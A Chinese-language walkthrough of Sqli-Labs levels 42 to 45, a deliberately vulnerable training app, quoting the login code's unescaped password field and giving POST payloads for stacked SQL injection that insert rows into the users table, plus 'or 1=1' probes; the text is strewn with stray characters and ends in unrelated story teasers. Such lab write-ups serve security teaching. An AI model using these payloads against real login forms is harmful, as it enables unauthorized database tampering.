Sqli-Labs:Less 42 - Less 45*

Less 42

基于存儲(chǔ)_POST_單引號(hào)_字符型_堆疊注入

0x01. 源碼分析

看著和 Less 24 一樣味廊,是一個(gè)相對(duì)完整的網(wǎng)站,實(shí)際上不只少了點(diǎn)什么…

acc-create.jpg

沒(méi)有忘記密碼和注冊(cè)功能…一樣的硬核扛禽。

登錄界面源碼:

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];

修改密碼源碼:

$username = $_SESSION["username"];
$curr_pass = mysql_real_escape_string($_POST['current_password']);
$pass = mysql_real_escape_string($_POST['password']);
$re_pass = mysql_real_escape_string($_POST['re_password']);

因?yàn)闆](méi)有注冊(cè)功能,所以登錄成功后的修改密碼便沒(méi)有什么作用赞赖,不能像 Less 24 一樣構(gòu)造用戶名進(jìn)行平行越權(quán)甜害。所以不用考慮在更新密碼處進(jìn)行注入,這關(guān)和二次注入的思路是不一樣的卑硫。

二次注入即update的數(shù)據(jù)(這關(guān)經(jīng)過(guò)mysql_real_escape_string()處理)徒恋,存入到數(shù)據(jù)庫(kù)當(dāng)中,在下一次select調(diào)用的時(shí)候發(fā)揮作用欢伏。詳細(xì)可參考 Less 24入挣。

0x02. 注入過(guò)程

這里網(wǎng)上的大部分包括《注入天書(shū)》只寫(xiě)了如何創(chuàng)建與刪除一個(gè)表,感覺(jué)并沒(méi)有用硝拧。
這里仍像 Less 38 - Less 41 一樣径筏,創(chuàng)建新的用戶信息(即插入數(shù)據(jù) / 注冊(cè))。
因有 MySQL 報(bào)錯(cuò)信息障陶,可以看出是單引號(hào)閉合滋恬。

login_user=admin&login_password=1';insert+into+users+values(42,'Less42','Less42')--+

接下來(lái)就可以利用盲注腳本跑整個(gè)數(shù)據(jù)庫(kù)的信息了(注意過(guò)濾)。

Less 43

基于存儲(chǔ)_POST_單引號(hào)_小括號(hào)_字符型_堆疊注入

與 Less 42 相似抱究,有 MySQL 報(bào)錯(cuò)信息恢氯。

login_user=admin&login_password=1');insert+into+users+values(43,'Less43','Less43')--+

Less 44

基于存儲(chǔ)_POST_單引號(hào)_字符型_盲注_堆疊注入

除了沒(méi)有 MySQL 報(bào)錯(cuò)信息,其他的沒(méi)有變化媳维。
當(dāng) POST 沒(méi)有報(bào)錯(cuò)回顯時(shí)酿雪,判斷查詢語(yǔ)句就需要構(gòu)造永真條件同化登錄失敗與查詢出錯(cuò),通過(guò)返回的圖片不同來(lái)確定是否符合查詢語(yǔ)句閉合的條件侄刽,參考 Less 15指黎。

login_user=admin&login_password=1 or 1=1--+
login_user=admin&login_password=1' or 1=1--+
login_user=admin&login_password=1" or 1=1--+
login_user=admin&login_password=1') or 1=1--+
login_user=admin&login_password=1") or 1=1--+

得出為單引號(hào)閉合:

login_user=admin&login_password=1';insert into users values(44,'Less44','Less44')--+

Less 45

基于存儲(chǔ)_POST_單引號(hào)_小括號(hào)_字符型_盲注_堆疊注入

同 Less 45,閉合增加了小括號(hào)州丹。

login_user=admin&login_password=1');insert into users values(45,'Less45','Less45')--+

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末醋安,一起剝皮案震驚了整個(gè)濱河市杂彭,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌吓揪,老刑警劉巖亲怠,帶你破解...
    沈念sama閱讀 221,888評(píng)論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異柠辞,居然都是意外死亡团秽,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,677評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門(mén)叭首,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)习勤,“玉大人,你說(shuō)我怎么就攤上這事焙格⊥急希” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 168,386評(píng)論 0 360
  • 文/不壞的土叔 我叫張陵眷唉,是天一觀的道長(zhǎng)予颤。 經(jīng)常有香客問(wèn)我,道長(zhǎng)冬阳,這世上最難降的妖魔是什么蛤虐? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 59,726評(píng)論 1 297
  • 正文 為了忘掉前任,我火速辦了婚禮肝陪,結(jié)果婚禮上笆焰,老公的妹妹穿的比我還像新娘。我一直安慰自己见坑,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,729評(píng)論 6 397
  • 文/花漫 我一把揭開(kāi)白布捏检。 她就那樣靜靜地躺著荞驴,像睡著了一般。 火紅的嫁衣襯著肌膚如雪贯城。 梳的紋絲不亂的頭發(fā)上熊楼,一...
    開(kāi)封第一講書(shū)人閱讀 52,337評(píng)論 1 310
  • 那天,我揣著相機(jī)與錄音能犯,去河邊找鬼鲫骗。 笑死,一個(gè)胖子當(dāng)著我的面吹牛踩晶,可吹牛的內(nèi)容都是我干的执泰。 我是一名探鬼主播,決...
    沈念sama閱讀 40,902評(píng)論 3 421
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼渡蜻,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼术吝!你這毒婦竟也來(lái)了计济?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 39,807評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤排苍,失蹤者是張志新(化名)和其女友劉穎沦寂,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體淘衙,經(jīng)...
    沈念sama閱讀 46,349評(píng)論 1 318
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡传藏,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,439評(píng)論 3 340
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了彤守。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片毯侦。...
    茶點(diǎn)故事閱讀 40,567評(píng)論 1 352
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖遗增,靈堂內(nèi)的尸體忽然破棺而出叫惊,到底是詐尸還是另有隱情,我是刑警寧澤做修,帶...
    沈念sama閱讀 36,242評(píng)論 5 350
  • 正文 年R本政府宣布霍狰,位于F島的核電站,受9級(jí)特大地震影響饰及,放射性物質(zhì)發(fā)生泄漏蔗坯。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,933評(píng)論 3 334
  • 文/蒙蒙 一燎含、第九天 我趴在偏房一處隱蔽的房頂上張望宾濒。 院中可真熱鬧,春花似錦屏箍、人聲如沸绘梦。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 32,420評(píng)論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)卸奉。三九已至,卻和暖如春颖御,著一層夾襖步出監(jiān)牢的瞬間榄棵,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,531評(píng)論 1 272
  • 我被黑心中介騙來(lái)泰國(guó)打工潘拱, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留疹鳄,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,995評(píng)論 3 377
  • 正文 我出身青樓芦岂,卻偏偏與公主長(zhǎng)得像瘪弓,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子禽最,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,585評(píng)論 2 359

推薦閱讀更多精彩內(nèi)容